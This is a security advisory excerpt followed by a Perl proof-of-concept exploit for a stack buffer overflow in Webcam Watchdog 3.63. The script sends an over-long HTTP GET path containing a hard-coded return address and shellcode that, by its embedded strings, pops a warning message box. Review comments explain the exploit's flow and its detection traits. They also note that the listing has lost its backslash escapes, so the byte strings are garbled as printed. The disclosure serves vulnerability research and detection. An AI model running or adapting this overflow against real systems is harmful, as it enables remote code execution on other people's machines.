source: http://www.securityfocus.com/bid/9351/info
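A problem has been identified in the handling of remote web requests by the Webcam Watchdog software. According to the proof-of-concept header below (tested on version 3.63), the flaw is a stack overflow, which the script triggers with an over-long path in an HTTP GET request. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable system.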
#!/usr/bin/perl -w
#
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
#
# - Tested on version 3.63 - MessageBoxA Shellcode
#
# - By Peter Winter-Smith [[email protected]]
use IO::Socket;
# Proof-of-concept flow: check arguments, open one TCP connection, send a
# single HTTP GET whose path carries filler + frame-pointer filler + return
# address + payload, wait two seconds, close.
#
# NOTE(review): the listing appears to have lost its backslashes in
# extraction (escapes show up as bare n, t, r and xNN), so as printed the
# string literals below are plain text, not the control characters and raw
# bytes the author evidently intended.
# NOTE(review): runs under -w only, with no `use strict`; every variable is
# a package global.

# Both arguments are required. The usage text mentions a default port of 80,
# but nothing here supplies one: a missing (or false, e.g. "0") second
# argument prints usage and exits.
if(!($ARGV[1]))
{
print "nUsage: wcwdpoc.pl <test_system> <port>n" .
"tDefault port is 80nn";
exit;
}
print "nWebcam Watchdog 3.63 Stack Overflow PoCn";
# Plain TCP connection to the host/port given on the command line; the
# script dies if the connection cannot be made.
$target = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
# Payload, described in the file header as "MessageBoxA Shellcode". The tail
# of the byte sequence is ASCII text: "user32", "dll", "MessageBoxA",
# "Warning!" and
# "This_version_of_Webcam_Watchdog_is_vulnerable_to_remote_compromise!",
# separated by 0xFE/0xFF bytes. Those strings are a fixed, searchable
# marker for this specific PoC in captured traffic.
$shellcode = "x90x90x90x90x90x90x90x90" .
"xEBx5Dx5Fx55x89xE5x81xC4" .
"xF0xFFxFFxFFx57xFCxB0xFE" .
"xF2xAEx80x47xFFx30x5Fx57" .
"x31xD2xB9xFFxFFxFFxFFxB2" .
"x05xB0xFFxF2xAExFEx47xFF" .
"x57xFExCAx80xFAx01x75xF3" .
"x81xECxFCxFFxFFxFFx89xE3" .
"xFFx73x0CxBExFFxECx59x42" .
"xC1xEEx08xFFx16xFFx73x08" .
"x50xBExFFxE4x59x42xC1xEE" .
"x08xFFx16x31xC9x51xFFx73" .
"x04xFFx33x51xFFxD0xCCx90" .
"xE8x9DxFFxFFxFFx75x73x65" .
"x72x33x32xFEx64x6Cx6CxFF" .
"x4Dx65x73x73x61x67x65x42" .
"x6Fx78x41xFFx57x61x72x6E" .
"x69x6Ex67x21xFFx54x68x69" .
"x73x5Fx76x65x72x73x69x6F" .
"x6Ex5Fx6Fx66x5Fx57x65x62" .
"x63x61x6Dx5Fx57x61x74x63" .
"x68x64x6Fx67x5Fx69x73x5F" .
"x76x75x6Cx6Ex65x72x61x62" .
"x6Cx65x5Fx74x6Fx5Fx72x65" .
"x6Dx6Fx74x65x5Fx63x6Fx6D" .
"x70x72x6Fx6Dx69x73x65x21" .
"xFF";
# Four filler bytes; the name suggests they occupy the saved frame-pointer
# slot (presumably - the target's stack layout is not shown here).
$ebp = "BBBB";
# Hard-coded address that, per the author's comment, is tied to one OS
# build's kernel32.dll; the PoC is therefore build-specific as written.
$eip = "x59xAExE9x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'
# Request path = 234 filler characters, then $ebp, $eip and the payload.
$badpage = "a"x234 . $ebp . $eip . $shellcode;
# The request has several fixed traits that are useful for detection: a
# request path hundreds of bytes long, the User-Agent value "WCSAXRView",
# and a Host header hard-coded to 127.0.0.1 regardless of the real target.
$request = "GET /" . $badpage. " HTTP/1.1rn" .
"User-Agent: WCSAXRViewrn" .
"Host: 127.0.0.1rn" .
"Cache-Control: no-cachernrn";
print $target $request;
print " + Testing remote systemn + MessageBox should appear if vulnerable!n";
# No response is read from the socket: the script cannot tell whether the
# target was affected, and "Done." is printed unconditionally. The result is
# only observable on the target's own desktop.
sleep(2);
close($target);
print "Done.n";
exit;